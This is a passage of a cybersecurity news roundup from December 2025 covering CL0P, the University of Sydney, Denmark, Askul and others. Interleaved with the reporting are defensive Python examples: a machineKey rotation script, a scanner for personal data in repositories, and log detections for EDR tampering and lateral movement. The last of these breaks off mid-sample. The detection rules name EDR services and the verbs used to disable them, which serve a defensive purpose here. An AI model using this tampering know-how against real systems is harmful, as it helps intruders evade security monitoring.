The La Poste cyberattack occurred against the backdrop of several recent cyber incidents in France involving major public institutions. Last week, France’s Interior Ministry disclosed a data breach that resulted in unauthorized access to internal email accounts and confidential documents. On December 17, 2025, authorities arrested a 22-year-old man in connection with the Interior Ministry cyberattack after an investigation led by the Paris prosecutor’s cybercrime unit. The suspect faces charges including unauthorized access to a state-run automated personal data processing system, an offense that carries a potential prison sentence of up to 10 years. Earlier, in November 2025, the French Football Federation confirmed a separate breach in which attackers used stolen credentials to access centralized membership management software. The incident exposed personal information belonging to licensed players registered through clubs nationwide. At the time of writing, La Poste has not attributed the cyberattack to any specific threat actor, and the source of the disruption remains unknown. The Cyber Express Editorial team has contacted the company for further clarification, but no response has been received so far.

CL0P Ransomware Group Targets Gladinet CentreStack in New Campaign

19 December 2025 at 11:59


The CL0P ransomware group appears to be targeting internet-facing Gladinet CentreStack file servers in its latest extortion campaign. The Curated Intelligence project said in a LinkedIn post that incident responders from its community “have encountered a new CLOP extortion campaign targeting Internet-facing CentreStack file servers.” Cyble said in a note to clients today that CL0P appears to be readying its dark web data leak site (DLS) for a new wave of victims following its exploitation of Oracle E-Business Suite vulnerabilities that netted more than 100 victims. “Monitoring of Cl0p's DLS indicates recent archiving and grouping of all previously listed victims associated with Oracle E-Business Suite exploitation under different folders, a move that strongly suggests preparation for a new wave of data leak publications,” Cyble said. “This restructuring activity is assessed to be linked to the ongoing exploitation of Gladinet CentreStack, with Cl0p likely staging victims for coordinated disclosure similar to its prior mass-extortion campaigns. No victim samples or deadlines related to the CentreStack victims have been published yet.”

CL0P May Be Targeting Gladinet CentreStack Vulnerabilities

It’s not clear if the CL0P campaign is exploiting a known or zero-day vulnerability, but in a comment on the LinkedIn post, Curated Intelligence said that an October Huntress report is “Likely related.” That report focused on CVE-2025-11371, a Files or Directories Accessible to External Parties vulnerability in Gladinet CentreStack and TrioFox that was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog on Nov. 4.

In a Dec. 10 report, Huntress noted that threat actors were also targeting CVE-2025-30406, a Gladinet CentreStack Use of Hard-coded Cryptographic Key vulnerability, and CVE-2025-14611, a Gladinet CentreStack and Triofox Hard-coded Cryptographic Key vulnerability. CVE-2025-30406 was added to the CISA KEV catalog in April, and CVE-2025-14611 was added to the KEV catalog on Dec. 15. In a Dec. 18 update to that post, Huntress noted the Curated Intelligence findings and said, “At present, we cannot say definitively that this is exploitation by the cl0p ransomware gang, but considering the timing of this reporting, we felt it was prudent to share this recent threat intel.”

The latest release on Gladinet's CentreStack website as of December 8 is version 16.12.10420.56791, Huntress noted. “We recommend that potentially impacted Gladinet customers update to this latest version immediately and ensure that the machineKey is rotated,” the blog post said. Curated Intelligence noted that recent port scan data shows more than 200 unique IPs running the “CentreStack - Login” HTTP Title, “making them potential targets of CLOP who is exploiting an unknown CVE (n-day or zero-day) in these systems.”
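Huntress's advice pairs the upgrade with rotating the machineKey, because a hard-coded key that shipped with the product is known to anyone who has a copy of it, and patching alone does not change it. The script below is an added example, not Gladinet's or Huntress's tooling. It assumes the CentreStack site is a standard ASP.NET application whose keys live in the machineKey element of web.config under system.web (the key lengths follow ASP.NET's sizes for HMACSHA256 validation and AES decryption); SAMPLE_WEB_CONFIG is a constructed fragment with a static key of the kind the advisory warns about.

```python
"""Rotate a hard-coded ASP.NET <machineKey> in a web.config.

Added example, not Gladinet's or Huntress's tooling. It assumes a standard
ASP.NET layout (<configuration>/<system.web>/<machineKey>); the config below
is constructed for the demo and its static key is deliberately weak.
"""
import secrets
import xml.etree.ElementTree as ET

# Constructed web.config fragment with a static, obviously predictable key.
SAMPLE_WEB_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <system.web>
    <machineKey validationKey="00112233445566778899AABBCCDDEEFF00112233445566778899AABBCCDDEEFF"
                decryptionKey="00112233445566778899AABBCCDDEEFF"
                validation="HMACSHA256" decryption="AES" />
  </system.web>
</configuration>
"""


def generate_machine_key():
    """Fresh random keys: 64 bytes for HMACSHA256 validation, 32 bytes for AES-256."""
    return {
        "validationKey": secrets.token_hex(64).upper(),
        "decryptionKey": secrets.token_hex(32).upper(),
        "validation": "HMACSHA256",
        "decryption": "AES",
    }


def rotate_machine_key(config_xml):
    """Return (new_xml, old_attrs, new_attrs); raise if no <machineKey> is present.

    A missing element is reported rather than silently added, because an app
    that relies on auto-generated keys needs a different review than one
    shipping a fixed key.
    """
    root = ET.fromstring(config_xml)
    node = root.find("./system.web/machineKey")
    if node is None:
        raise ValueError("no <machineKey> element under <system.web>")
    old = dict(node.attrib)
    new = generate_machine_key()
    node.attrib.clear()
    node.attrib.update(new)
    return ET.tostring(root, encoding="unicode"), old, new


def is_rotated(old, new):
    """True when both keys changed and have the expected hex lengths."""
    return (old.get("validationKey") != new["validationKey"]
            and old.get("decryptionKey") != new["decryptionKey"]
            and len(new["validationKey"]) == 128
            and len(new["decryptionKey"]) == 64)


if __name__ == "__main__":
    xml_out, before, after = rotate_machine_key(SAMPLE_WEB_CONFIG)
    print("rotated:", is_rotated(before, after))
    print(xml_out)
```

Rotation invalidates every existing ViewState and forms-authentication ticket, so schedule it with a restart and expect users to re-authenticate; in a multi-node deployment every node must receive the same new key or sessions will fail between nodes. It also does nothing to evict an attacker who has already used the old key to gain code execution, so rotate only as part of the upgrade plus a review of the server for webshells, new accounts and scheduled tasks.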

CL0P’s History of File Transfer Attacks

Curated Intelligence noted that CL0P has a long history of targeting file sharing and transfer services. “This is yet another similar data extortion campaign by this adversary,” the project said. “CLOP is well-known for targeting file transfer servers such as Oracle EBS, Cleo FTP, MOVEit, CrushFTP, SolarWinds Serv-U, PaperCut, GoAnywhere, among others.” CL0P’s exploitation of Cleo MFT vulnerabilities led to a record number of ransomware attacks earlier this year, and CL0P has also successfully exploited Accellion FTA vulnerabilities. The group’s ability to successfully exploit vulnerabilities at scale has made it a top five ransomware group over its six-year history (image below from Cyble). (Image: top ransomware groups of all time; CL0P is a top five ransomware group over its six-year history. Source: Cyble.)

University of Sydney Cyberattack Exposes Decades of Staff and Student Data

19 December 2025 at 08:35


The University of Sydney has confirmed a major cybersecurity incident that resulted in the exposure of personal information belonging to thousands of current and former staff members, as well as smaller groups of students, alumni, and supporters. The University of Sydney cyberattack was formally disclosed to the university community on December 18, 2025, after the institution detected unauthorized access to an internal online IT code library. University officials said the suspicious activity was identified last week during monitoring of the platform, which is primarily used for software development and code storage. While the system was never intended to house personal records, investigators found that historical data files had been stored within the library, largely for testing purposes. These files were accessed and downloaded by an unauthorized party before the university intervened. Upon discovering the University of Sydney cyberattack, the university immediately blocked unauthorized access and secured the affected environment. Officials also clarified that the cyberattack on University of Sydney was unrelated to a separate incident involving student results reported earlier.

Decoding the University of Sydney Cyberattack

According to the university’s investigation to date, the data breach at the University of Sydney affected a wide range of individuals. The compromised files included a historical dataset from a retired system containing personal information about staff employed at the university as of September 4, 2018. Exposed details included names, dates of birth, phone numbers, home addresses, and basic employment information such as job titles and dates of employment. In total, personal information belonging to around 10,000 current staff and affiliates and approximately 12,500 former staff and affiliates from that period was accessed. In addition, a collection of historical datasets, primarily from 2010 to 2019, contained personal information relating to about 5,000 students and alumni, along with data belonging to six supporters. Vice President for Operations Nicole Gower addressed staff in a written message confirming the scope of the University of Sydney cyberattack and offering an apology. “We understand this news may cause concern, and we sincerely apologise for any distress this may cause,” Gower wrote. “While the data has been accessed and downloaded, there is currently no evidence that it has been used or published.”
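The security lesson in this incident is that a code repository "never intended to house personal records" held real staff and student datasets as test fixtures, so anyone with read access to the repository had the data. A practical control is to scan checkouts for delimited files whose rows combine several PII-looking fields. The script below is an added example, not the University of Sydney's tooling: it samples the first rows of CSV, TSV and TXT files and counts rows carrying two or more of a date of birth, a phone number and an e-mail address. The regular expressions, the threshold of five hits and the repository that demo() builds (one README, one harmless settings file, one fixture resembling a staff export) are constructed for the demonstration.

```python
"""Flag data files in a code repository that look like real personal records.

Added example, not the University of Sydney's tooling. Patterns, thresholds and
the sample checkout built by demo() are constructed for the demonstration.
"""
import csv
import os
import re
import tempfile

DATA_EXT = {".csv", ".tsv", ".txt"}
SKIP_DIRS = {".git", "node_modules", ".venv"}
# ISO (1985-03-12) or day-first (12/03/1985) dates of birth.
DOB_RE = re.compile(r"\b(?:19|20)\d{2}[-/](?:0[1-9]|1[0-2])[-/](?:0[1-9]|[12]\d|3[01])\b"
                    r"|\b(?:0[1-9]|[12]\d|3[01])/(?:0[1-9]|1[0-2])/(?:19|20)\d{2}\b")
# Loose phone shape: optional country code, a 2-4 digit group, then two 3-4 digit groups.
PHONE_RE = re.compile(r"\b(?:\+?\d{1,3}[ -]?)?\(?\d{2,4}\)?[ -]?\d{3,4}[ -]?\d{3,4}\b")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")
PATTERNS = (DOB_RE, PHONE_RE, EMAIL_RE)


def pii_fields(row):
    """Number of distinct PII kinds (DOB, phone, e-mail) present in one row."""
    text = " ".join(row)
    return sum(1 for pattern in PATTERNS if pattern.search(text))


def scan_file(path, sample_rows=200):
    """Return (rows_sampled, rows_with_two_or_more_pii_fields) for a delimited file."""
    dialect = "excel-tab" if path.endswith(".tsv") else "excel"
    with open(path, "r", encoding="utf-8", errors="ignore", newline="") as fh:
        rows = [row for _, row in zip(range(sample_rows), csv.reader(fh, dialect=dialect))]
    return len(rows), sum(1 for row in rows if pii_fields(row) >= 2)


def scan_repo(root, min_hits=5):
    """Map relative path -> (rows_sampled, pii_rows) for files at or over min_hits."""
    findings = {}
    for dirpath, dirnames, files in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]
        for name in files:
            if os.path.splitext(name)[1].lower() not in DATA_EXT:
                continue
            full = os.path.join(dirpath, name)
            sampled, hits = scan_file(full)
            if hits >= min_hits:
                findings[os.path.relpath(full, root).replace(os.sep, "/")] = (sampled, hits)
    return findings


def demo():
    """Build a constructed checkout with one real-looking fixture and scan it."""
    root = tempfile.mkdtemp()

    def write(rel, text):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(text)

    write("README.txt", "Build instructions: run make; no personal data here.\n")
    write("src/settings.csv", "key,value\ntimeout,30\nretries,5\n")
    # Constructed fixture shaped like a staff export (names and contacts are made up).
    write("tests/fixtures/staff_2018.csv",
          "name,dob,phone,email\n"
          "A Person,1985-03-12,0412345678,a.person@example.test\n"
          "B Person,1979-11-30,0423456789,b.person@example.test\n"
          "C Person,1990-06-05,0434567890,c.person@example.test\n"
          "D Person,1962-01-22,0445678901,d.person@example.test\n"
          "E Person,1988-09-14,0456789012,e.person@example.test\n"
          "F Person,1975-04-01,0467890123,f.person@example.test\n")
    return scan_repo(root)


if __name__ == "__main__":
    print(demo())
```

Run it as a pre-commit or CI step on the repository root, and treat a hit as a question for the committer rather than a verdict: synthetic fixtures can trip it, but the fix in either case is to generate test data rather than copy an export of a production system.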

Investigation, Notifications, and Official Response

The University of Sydney has reported the incident to multiple government authorities, including the NSW Privacy Commissioner, the Australian Cyber Security Centre, the Tertiary Education Quality and Standards Agency, the National Student Ombudsman, and ID Support NSW. The university is also working with external cybersecurity partners to assess whether any of the accessed data has been disclosed online.

At this stage, the university believes the unauthorized access was confined to a single platform and did not compromise other university systems. However, the investigation remains ongoing and is expected to continue into the new year due to its complexity.

Notifications to affected individuals began on December 18, 2025. The university expects to complete this process by January 2026, once file reviews are finalized and contact details for all impacted individuals are confirmed. Updates and responses to frequently asked questions are being published on the university’s website as the situation evolves.

Support Services and Advice for Affected Individuals

In response to the University of Sydney data breach, a range of support services has been made available to staff, students, alumni, and affiliates. A dedicated cyber incident support service has been established to handle inquiries and will remain operational during the university’s closedown period from December 20, 2025, to January 5, 2026, excluding public holidays.

Staff members have access to counseling and wellbeing services through Converge International, while students can seek free and confidential support through Student Wellbeing services, which are available 24/7. Additional assistance is available through external organizations such as ID Support NSW, IDCARE, Beyond Blue, and Lifeline.

The university has also issued guidance urging affected individuals to remain vigilant by monitoring accounts for unusual activity, changing passwords, enabling multi-factor authentication, and being cautious of phishing attempts. Officials also cautioned against sharing details of the incident on social media, to reduce the risk of scams that use those details to appear credible.

University leadership reiterated that cybersecurity remains a priority and noted that an extensive program to strengthen data management practices has been underway for the past three years. Further updates will be provided as the investigation into the cyberattack on the University of Sydney progresses and additional findings become available.

Denmark Accuses Russia of Destructive Cyberattacks Amid Rising Hybrid Threats in Europe

19 December 2025 at 03:22

Denmark Cyberattack

Denmark cyberattack allegations have escalated into a diplomatic confrontation with Russia, after Danish authorities accused Moscow of orchestrating two cyber incidents targeting critical infrastructure and democratic processes. On Thursday, Denmark announced it would summon the Russian ambassador following findings by the Danish Defence Intelligence Service (DDIS) linking Russia to a destructive cyberattack on a Danish water utility in 2024 and a series of distributed denial-of-service (DDoS) attacks on Danish websites ahead of elections last month.

Danish officials described the Denmark cyberattack incidents as part of Russia’s broader hybrid warfare campaign against European countries supporting Ukraine, marking a rare public attribution of state-linked cyber operations.

Denmark accuses Russia of cyberattacks (Source: Denmark MFA)

In an official statement, Danish authorities said, “Russia is responsible for destructive and disruptive cyberattacks against Denmark.” The DDIS assessed that the Z-Pentest group, which executed the 2024 water utility attack, has links to the Russian state. Similarly, the agency determined that NoName057(16), the group responsible for the election-related DDoS attacks, also maintains ties to Russian state interests.

Denmark Cyberattack on Water Utility Exposed Infrastructure Weaknesses 

The cyberattack on Denmark’s water infrastructure occurred in 2024 and targeted a waterworks facility in Køge. According to Danish officials, a hacker gained control of operational systems and altered pump pressure levels, causing pipes to burst. While the physical damage was limited, the incident raised serious concerns about the security of critical infrastructure.

Denmark’s Defence Minister Troels Lund Poulsen condemned the attack, calling it “completely unacceptable” and warning that hybrid warfare is no longer a theoretical risk. He said the incident demonstrated how cyber operations could translate into real-world consequences. Poulsen confirmed that Denmark would summon the Russian ambassador in response to the findings.

Election-Related DDoS Attacks and Influence Campaigns 

In the lead-up to Denmark’s 2025 municipal and regional elections, multiple government and public-sector websites were hit by DDoS attacks designed to overwhelm servers and disrupt access. The DDIS stated that the attacks were intended not only to disrupt digital services but also to attract public attention and amplify insecurity during a politically sensitive period.

“The aim is to create insecurity in the targeted countries and to punish those that support Ukraine,” the intelligence service said, adding that Russia’s cyber operations form part of a broader influence campaign designed to undermine Western backing for Kyiv.

The agency noted that Danish elections were used as a platform for disruption, a tactic that has been observed in several other European countries facing similar cyberattacks and election-related interference.

November 2025 Cyberattacks on Government and Defense Websites 

Earlier reporting by The Cyber Express documented additional cyberattacks on Denmark that occurred on November 13, when multiple government and defense-related websites experienced outages. Denmark’s Civil Protection Agency confirmed that the disruptions were caused by DDoS attacks affecting several Danish companies and public-sector platforms.

“Several Danish companies and websites were currently experiencing outages and operating disruptions because of DDoS attacks,” the agency said, noting that authorities were closely monitoring the situation alongside military intelligence.

Shortly after the incident, NoName057(16) claimed responsibility on social media, alleging it had targeted systems belonging to the Danish government, including the Ministry of Transport and the public-sector portal Borger.dk. Defense contractor Terma was also named, and later confirmed it had been affected.

Terma spokesperson Tobias Brun-Falkencrone urged caution, stating, “We’re aware that a Russian hacker group has claimed that it would disrupt our website, as well as the ones of several Danish authorities, but it’s too early to say they are responsible.” He added that the company responded effectively and that no data was lost.

Part of a Broader European Pattern 

International reporting from outlets including AFP and Ukrinform has linked the cyberattack on Denmark to a wider wave of pro-Russia cyber activity across Europe. Recent incidents include data theft from a Dutch municipality, a payment system breach in Poland affecting a major tour company, and the exposure of sensitive employee data from a British defense contractor by Russia-linked hackers.

While Danish authorities have not reported long-term damage or data loss, officials warned that repeated cyberattacks highlight persistent vulnerabilities in public infrastructure. The Civil Protection Agency and military intelligence services continue to monitor the situation.

The DDIS concluded that Russia’s use of proxy hacker groups reflects an evolving hybrid threat environment in which cyber operations are increasingly used to exert pressure, destabilize societies, and influence political outcomes without crossing traditional military thresholds.

Beyond Compliance: How India’s DPDP Act Is Reshaping the Cyber Insurance Landscape

19 December 2025 at 00:38

DPDP Act Is Reshaping the Cyber Insurance Landscape

By Gauravdeep Singh, Head – State e-Mission Team (SeMT), Ministry of Electronics and Information Technology

The Digital Personal Data Protection (DPDP) Act has fundamentally altered the risk landscape for Indian organisations. Data breaches now trigger mandatory compliance obligations regardless of their origin, transforming incidents that were once purely operational concerns into regulatory events with significant financial and legal implications.

Case Study 1: Cloud Misconfiguration in a Consumer Platform

A prominent consumer-facing platform experienced a data exposure incident when a misconfigured storage bucket on its public cloud infrastructure inadvertently made customer data publicly accessible. While no malicious actor was involved, the incident still constituted a reportable data breach under the DPDP Act framework. The organisation faced several immediate obligations:
  • Notification to affected individuals within prescribed timelines
  • Formal reporting to the Data Protection Board
  • Comprehensive internal investigation and remediation measures
  • Potential penalties for failure to implement reasonable security safeguards as mandated under the Act
Such incidents highlight a critical gap in traditional risk management approaches. The financial exposure—encompassing regulatory penalties, legal costs, remediation expenses, and reputational damage—frequently exceeds conventional cyber insurance coverage limits, particularly when compliance failures are implicated.

Case Study 2: Ransomware Attack on Healthcare and EdTech Infrastructure

A mid-sized healthcare and education technology provider fell victim to a ransomware attack that encrypted sensitive personal records. Despite successful restoration from backup systems, the organisation confronted extensive regulatory and operational obligations:
  • Forensic assessment to determine whether data confidentiality was compromised
  • Mandatory notification to regulatory authorities and affected data principals
  • Ongoing legal and compliance proceedings
The total cost extended far beyond any ransom demand. Forensic investigations, legal advisory services, public communications, regulatory compliance activities, and operational disruption collectively created substantial financial strain, costs that would have been mitigated with appropriate insurance coverage.

Case Study 3: AI-Enabled Fraud and Social Engineering

The emergence of AI-driven attack vectors has introduced new dimensions of cyber risk. Deepfake technology and sophisticated phishing campaigns now enable threat actors to impersonate senior leadership with unprecedented authenticity, compelling finance teams to authorise fraudulent fund transfers or inappropriate data disclosures. These attacks often circumvent traditional technical security controls because they exploit human trust rather than system vulnerabilities. As a result, organisations are increasingly seeking insurance coverage for social engineering and cyber fraud events, particularly those involving personal data or financial information, that fall outside conventional cybersecurity threat models.

The Evolution of Cyber Insurance in India

The Indian cyber insurance market is undergoing significant transformation in response to the DPDP Act and evolving threat landscape. Modern policies now extend beyond traditional hacking incidents to address:
  • Data breaches resulting from human error or operational failures
  • Third-party vendor and SaaS provider security failures
  • Cloud service disruptions and availability incidents
  • Regulatory investigation costs and legal defense expenses
  • Incident response, crisis management, and public relations support
Organisations are reassessing their coverage adequacy as they recognise that historical policy limits of Rs. 10–20 crore may prove insufficient when regulatory penalties, legal costs, business interruption losses, and remediation expenses are aggregated under the DPDP compliance framework.

The SME and MSME Vulnerability

Small and medium enterprises represent the most vulnerable segment of the market. While many SMEs and MSMEs regularly process personal data, they frequently lack:
  • Mature information security controls and governance frameworks
  • Dedicated compliance and data protection teams
  • Financial reserves to absorb penalties, legal costs, or operational disruption
For organisations in this segment, even a relatively minor cyber incident can trigger prolonged operational shutdowns or, in severe cases, permanent closure. Despite this heightened vulnerability, cyber insurance adoption among SMEs remains disproportionately low, driven primarily by awareness gaps and perceived cost barriers.

Implications for the Cyber Insurance Ecosystem

The Indian cyber insurance market is entering a period of accelerated growth and structural evolution. Several key trends are emerging:
  • Higher policy limits becoming standard practice across industries
  • Enhanced underwriting processes emphasising compliance readiness and data governance maturity
  • Comprehensive coverage integrating legal advisory, forensic investigation, and regulatory support
  • Risk-based pricing models that reward robust data protection practices
Looking ahead, cyber insurance will increasingly be evaluated not merely as a risk-transfer mechanism, but as an indicator of an organisation's overall data protection posture and regulatory preparedness.

DPDP Act and the End of Optional Cyber Insurance

The DPDP Act has fundamentally redefined cyber risk in the Indian context. Data breaches are no longer isolated IT failures; they are regulatory events carrying substantial financial, legal, and reputational consequences. In this environment, cyber insurance is transitioning from a discretionary safeguard to a strategic imperative. Organisations that integrate cyber insurance into a comprehensive data governance and enterprise risk management strategy will be better positioned to navigate the evolving regulatory landscape. Conversely, those that remain uninsured or underinsured may discover that the cost of inadequate preparation far exceeds the investment required for robust protection. (This article reflects the author’s analysis and personal viewpoints and is intended for informational purposes only. It should not be construed as legal or regulatory advice.)

France Alleges ‘Foreign Interference’ After RAT Malware Found on Ferry

18 December 2025 at 13:20

France claims 'foreign interference' in ferry malware case

France is investigating whether “foreign interference” was behind remote access trojan (RAT) malware that was discovered on a passenger ferry. The ferry malware was “capable of allowing the vessel's operating systems to be controlled remotely,” Le Monde reported today, citing the Interior Minister. Interior Minister Laurent Nuñez told France Info radio that hacking into a ship's data-processing system “is a very serious matter ... Investigators are obviously looking into interference. Yes, foreign interference.” Nuñez would not speculate on whether the attack was intended to interfere with the ship’s navigation, and he did not specifically name Russia, but he said, "These days, one country is very often behind foreign interference." The office of the Paris prosecutor said it had opened an investigation into a suspected attempt "by an organized group to attack an automated data-processing system, with the aim of serving the interests of a foreign power.”

Latvian Arrested in Ferry Malware Case

Two crew members, a Latvian and a Bulgarian, were detained after they were identified by Italian authorities, but the Bulgarian was later released. The Latvian was arrested and charged after the malware was found on the Fantastic, a 2,000-passenger ferry owned by the Italian shipping company GNV, while it was docked in France's Mediterranean port of Sète. GNV said it had alerted Italian authorities, saying in a statement that it had "identified and neutralized an attempt at intrusion on the company's computer systems, which are effectively protected. It was without consequences," France 24 reported.

Christian Cevaer, director of the France Cyber Maritime monitor, told AFP that any attempt to take control of a ship would be a "critical risk" because of "serious physical consequences" that could endanger passengers. Cevaer said such an operation would likely require a USB key to install the software, which would require "complicity within the crew."

The investigation is being led by France's domestic intelligence service, the General Directorate for Internal Security (DGSI), as a sign of the importance of the case, France 24 said. After cordoning off the ship in the port, the Fantastic was inspected by the DGSI, “which led to the seizure of several items,” France 24 said. After technical inspections ruled out any danger to passengers, the ship was cleared to sail again. Searches were also conducted in Latvia with the support of Eurojust and Latvian authorities. Meanwhile, the Latvian suspect’s attorney said the investigation “will demonstrate that this case is not as worrying as it may have initially seemed,” according to a quote from the attorney as reported by France 24.

Ferry Malware Follows French Interior Ministry Attack

The ferry malware incident closely follows a cyberattack on the French Interior Ministry’s internal email systems that led to the arrest of a 22-year-old man in connection with the attack. The cyberattack was detected overnight between Thursday, December 11, and Friday, December 12, and resulted in unauthorized access to a number of document files. Nuñez described the incident as more serious than initially believed. Speaking to France Info radio, he said, “It’s serious. A few days ago, I said that we didn’t know whether there had been any compromises or not. Now we know that there have been compromises, but we don’t know the extent of them.” Authorities later confirmed that the compromised files included criminal records, raising concerns about the sensitivity of the exposed information.

Askul Restarts Logistics as Ransomware Attack Exposes 740,000 Records

18 December 2025 at 01:43

Askul cyberattack

Japanese office and household goods supplier Askul Corporation has begun restoring core logistics operations following a prolonged disruption caused by a ransomware incident. The Askul cyberattack, first detected on October 19, 2025, led to system outages, operational paralysis, and the confirmed exposure of sensitive personal and business data. After nearly two months of recovery work, Askul announced that system-based shipment operations had resumed, starting with two logistics centers located in Tokyo and neighboring Saitama Prefecture. The company said that eight additional distribution hubs will be brought back online gradually as safety assessments are completed. Speaking to reporters at a logistics center in Tokyo’s Edogawa Ward, President and CEO Akira Yoshioka issued a formal apology. “I sincerely apologize for the trouble and concern caused to many customers,” Yoshioka said. He added that the company was committed to pursuing “a full-fledged security governance reform” in response to the incident.

Disruption to Operations and Gradual Recovery 

The Askul cyberattack forced the company to suspend nearly all online services shortly after detection. Order intake and shipping operations across its ASKUL, Soloel Arena, and LOHACO platforms were halted on the afternoon of October 19, following confirmation that ransomware had encrypted internal systems. During the initial recovery phase, Askul accepted only limited orders via fax, restricting shipments to a small selection of essential items.

As system restoration progressed, the company gradually expanded order acceptance, prioritizing high-demand products such as copier paper. However, Yoshioka declined to provide a timeline for full restoration of logistics operations, stating that remaining hubs would reopen incrementally based on ongoing safety evaluations.

Confirmation of Large-Scale Data Theft 

Beyond operational disruption, the Askul data breach involved the theft of sensitive information. Askul confirmed that approximately 740,000 records were stolen during the ransomware incident, which has been linked to the RansomHouse extortion group.

According to Askul’s disclosures, the compromised data includes approximately 590,000 business customer service records and roughly 132,000 individual customer records. In addition, information related to around 15,000 business partners, such as agents, contractors, and suppliers, was affected, along with data belonging to about 2,700 executives and employees, including those at group companies.

Askul stated that detailed breakdowns of the exposed information were withheld to prevent secondary misuse. Affected customers and partners are being notified individually, and the company has reported the data breach at Askul to Japan’s Personal Information Protection Commission. Long-term monitoring measures have also been implemented to detect potential misuse of stolen data.

Importantly, Askul clarified that it does not store customer credit card information for LOHACO transactions, as payment processing is handled through an external system designed to prevent the company from accessing such data.

Attack Timeline and RansomHouse Involvement 

The RansomHouse group publicly claimed responsibility for the Askul cyberattack, first disclosing the breach on October 30. Additional data leaks followed on November 10 and December 2. Askul confirmed that all published data was reviewed and analyzed by October 31, November 11, and December 9, respectively. A dedicated inquiry desk for affected individuals was established on November 4.

In its 13th official update, released on December 12, Askul provided a detailed chronology of the incident. After detecting ransomware activity on October 19, the company immediately isolated suspected infected systems, disconnected networks, strengthened monitoring, and initiated a company-wide password reset. By 2:00 p.m. that day, a formal incident response headquarters and specialized recovery teams were established.

External cybersecurity experts were engaged on October 20 to conduct forensic investigations, including log analysis and impact assessments. Despite these efforts, unauthorized access to an external cloud-based inquiry management system was identified on October 22. Password resets for major cloud services were completed by October 23, after which no further intrusions were confirmed.

Technical Findings and Root Cause Analysis 

Askul’s investigation concluded that attackers likely gained initial access using stolen authentication credentials tied to an outsourced partner’s administrative account that lacked multi-factor authentication. After entering the internal network, the attackers conducted reconnaissance, collected additional credentials, disabled endpoint detection and response (EDR) tools, and moved laterally across servers.

Notably, Askul confirmed that multiple ransomware variants were deployed, including strains that evaded EDR signatures available at the time. Once sufficient privileges were obtained, attackers simultaneously encrypted data across logistics and internal systems, including backup files. This delayed recovery efforts.

The attack had a severe impact on Askul’s logistics infrastructure, which relies heavily on automated warehouses, picking systems, and integrated logistics platforms. When these systems were disabled, outbound shipments were completely halted.

Investigators also confirmed unauthorized access to an external cloud-based inquiry management system, from which data was exfiltrated and later published. Askul stated that no evidence of compromise was found in its core business systems or customer-facing platforms.
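
Each stage in that root-cause account leaves a distinct trace: a successful remote logon without MFA from outside the organisation, an EDR service being stopped, and one account authenticating to many servers in a short window. The detection below is an added example, not Askul's tooling or data: it runs three such rules over a constructed key=value audit extract. The log format, account and host names, the internal address ranges, the EDR service watchlist and the lateral-movement threshold are all assumptions for illustration; in a real environment the same signals come from VPN/IdP audit logs, Windows System event 7036 (service state change) or Sysmon, and Security event 4624 logon type 3.

```python
"""
Added example: three detections matching the intrusion stages described
above (no-MFA external logon, EDR tampering, lateral movement), run over
constructed sample log lines.  All identifiers are assumed.
"""
import shlex
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network
from typing import Dict, List

# Assumptions for the example: the organisation's internal ranges, the EDR
# service names to watch, and what counts as "many hosts, quickly".
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
EDR_SERVICES = {"EdrAgent", "SentinelAgent", "CSFalconService"}
TAMPER_VERBS = ("stop", "delete", "disable", "uninstall")
LATERAL_HOSTS = 3
LATERAL_WINDOW = timedelta(minutes=30)


def parse_line(line: str) -> Dict[str, str]:
    """Parse one key=value audit line; values may be double-quoted."""
    fields = {}
    for tok in shlex.split(line):
        if "=" in tok:
            k, v = tok.split("=", 1)
            fields[k] = v
    return fields


def is_external(ip: str) -> bool:
    """True when the source address is outside every internal range."""
    try:
        addr = ip_address(ip)
    except ValueError:
        return False
    return not any(addr in net for net in INTERNAL_NETS)


def detect(log_text: str) -> List[dict]:
    events = [parse_line(ln) for ln in log_text.splitlines() if ln.strip()]
    findings: List[dict] = []

    # Rule 1: successful remote logon with no MFA from an external address.
    for e in events:
        if (e.get("event") == "logon" and e.get("result") == "success"
                and e.get("mfa") == "no" and is_external(e.get("src", ""))):
            findings.append({"rule": "no_mfa_external_logon", "user": e["user"],
                             "host": e["host"], "ts": e["ts"]})

    # Rule 2: EDR agent stopped or removed, seen either as a service state
    # change or as the command line that caused it; one finding per host/service.
    seen = set()
    for e in events:
        svc = None
        if (e.get("event") == "service" and e.get("service") in EDR_SERVICES
                and e.get("state") in {"stopped", "deleted", "disabled"}):
            svc = e["service"]
        elif e.get("event") == "process":
            cmd = e.get("cmd", "")
            if any(v in cmd.lower() for v in TAMPER_VERBS):
                svc = next((s for s in EDR_SERVICES if s in cmd), None)
        if svc and (e["host"], svc) not in seen:
            seen.add((e["host"], svc))
            findings.append({"rule": "edr_tamper", "user": e.get("actor") or e.get("user"),
                             "host": e["host"], "service": svc, "ts": e["ts"]})

    # Rule 3: one account reaching LATERAL_HOSTS distinct hosts inside LATERAL_WINDOW.
    logons = defaultdict(list)
    for e in events:
        if e.get("event") == "logon" and e.get("result") == "success":
            logons[e["user"]].append((datetime.fromisoformat(e["ts"]), e["host"]))
    for user, items in logons.items():
        items.sort()
        for i, (t0, _) in enumerate(items):
            hosts = {h for t, h in items[i:] if t - t0 <= LATERAL_WINDOW}
            if len(hosts) >= LATERAL_HOSTS:
                findings.append({"rule": "lateral_movement", "user": user,
                                 "hosts": sorted(hosts), "ts": t0.isoformat()})
                break
    return findings


# Constructed sample extract (timestamps, names and addresses are fabricated).
SAMPLE_LOG = """\
ts=2025-10-18T22:40:11 event=logon user=partner-admin src=203.0.113.45 host=vpn-gw result=success mfa=no
ts=2025-10-18T22:41:03 event=logon user=ops-user src=203.0.113.80 host=vpn-gw result=success mfa=yes
ts=2025-10-18T22:52:30 event=logon user=partner-admin src=10.0.5.12 host=FS01 result=success mfa=n/a
ts=2025-10-18T22:58:12 event=logon user=partner-admin src=10.0.5.12 host=DC01 result=success mfa=n/a
ts=2025-10-18T23:04:47 event=logon user=partner-admin src=10.0.5.12 host=WMS02 result=success mfa=n/a
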